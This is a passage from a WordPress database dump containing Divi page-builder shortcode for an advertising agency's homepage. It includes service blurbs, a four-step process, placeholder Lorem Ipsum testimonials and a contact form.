custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Advertising agency in delhi\" title_text=\"Advertising agency in delhi\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy for success\" title_text=\"marketing strategy for success\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 16:59:31','2020-08-07 16:59:31','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(510,1,'2020-08-07 17:01:41','2020-08-07 17:01:41','','best-advertising-agency','what the hell best advertising agency in delhi.','inherit','open','closed','','artboard-copy-12','','','2020-08-07 17:02:29','2020-08-07 17:02:29','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png',0,'attachment','image/png',0),(511,1,'2020-08-07 17:02:32','2020-08-07 17:02:32','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" 